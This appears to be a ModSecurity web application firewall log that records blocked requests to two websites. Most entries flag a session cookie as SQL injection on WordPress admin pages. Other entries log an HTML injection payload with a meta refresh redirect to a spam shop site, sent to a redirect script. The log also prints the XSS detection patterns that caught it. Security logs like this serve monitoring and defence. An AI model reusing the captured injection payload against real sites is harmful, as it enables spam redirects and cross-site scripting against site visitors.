[Mon May 11 18:34:13.511269 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFBUWKUxpmnkK7zHysTAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:13.511647 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFBUWKUxpmnkK7zHysTAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:14.107825 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFBUWKUxpmnkK7zHysTAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:14.369279 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFBkWKUxpmnkK7zHysTQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:14.369561 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFBkWKUxpmnkK7zHysTQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:14.954599 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFBkWKUxpmnkK7zHysTQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:15.067713 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFB0WKUxpmnkK7zHysTwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:15.068003 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFB0WKUxpmnkK7zHysTwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:15.284427 2026] [security2:error] [pid 1424905:tid 1424922] [client 27.78.84.116:57253] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFB4W8yzYoWG_eyCXCswAAAU4"]
[Mon May 11 18:34:15.299676 2026] [security2:error] [pid 1424905:tid 1424922] [client 27.78.84.116:57253] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFB4W8yzYoWG_eyCXCswAAAU4"]
[Mon May 11 18:34:15.307327 2026] [security2:error] [pid 1424905:tid 1424922] [client 27.78.84.116:57253] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-tr..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFB4W8yzYoWG_eyCXCswAAAU4"]
[Mon May 11 18:34:15.319252 2026] [security2:error] [pid 1424905:tid 1424922] [client 27.78.84.116:57253] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFB4W8yzYoWG_eyCXCswAAAU4"]
[Mon May 11 18:34:15.321414 2026] [security2:error] [pid 1424905:tid 1424922] [client 27.78.84.116:57253] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFB4W8yzYoWG_eyCXCswAAAU4"]
[Mon May 11 18:34:15.321934 2026] [security2:error] [pid 1424905:tid 1424922] [client 27.78.84.116:57253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFB4W8yzYoWG_eyCXCswAAAU4"]
[Mon May 11 18:34:15.322719 2026] [security2:error] [pid 1424905:tid 1424922] [client 27.78.84.116:57253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFB4W8yzYoWG_eyCXCswAAAU4"]
[Mon May 11 18:34:15.664285 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFB0WKUxpmnkK7zHysTwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:15.875361 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFB0WKUxpmnkK7zHysUQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:15.875775 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFB0WKUxpmnkK7zHysUQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:16.251399 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFB0WKUxpmnkK7zHysUQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:16.629327 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFCEWKUxpmnkK7zHysUgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:16.629718 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFCEWKUxpmnkK7zHysUgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:17.256456 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFCEWKUxpmnkK7zHysUgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:17.575726 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFCUWKUxpmnkK7zHysVAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:17.576016 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFCUWKUxpmnkK7zHysVAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:18.199276 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFCUWKUxpmnkK7zHysVAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:18.506624 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFCkWKUxpmnkK7zHysVgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:18.506896 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFCkWKUxpmnkK7zHysVgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:19.122441 2026] [security2:error] [pid 1424905:tid 1424929] [client 27.78.84.116:57708] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFC4W8yzYoWG_eyCXCtgAAAVU"]
[Mon May 11 18:34:19.130999 2026] [security2:error] [pid 1424905:tid 1424929] [client 27.78.84.116:57708] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFC4W8yzYoWG_eyCXCtgAAAVU"]
[Mon May 11 18:34:19.131516 2026] [security2:error] [pid 1424905:tid 1424929] [client 27.78.84.116:57708] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-tr..."] [severity "CRITICAL"] 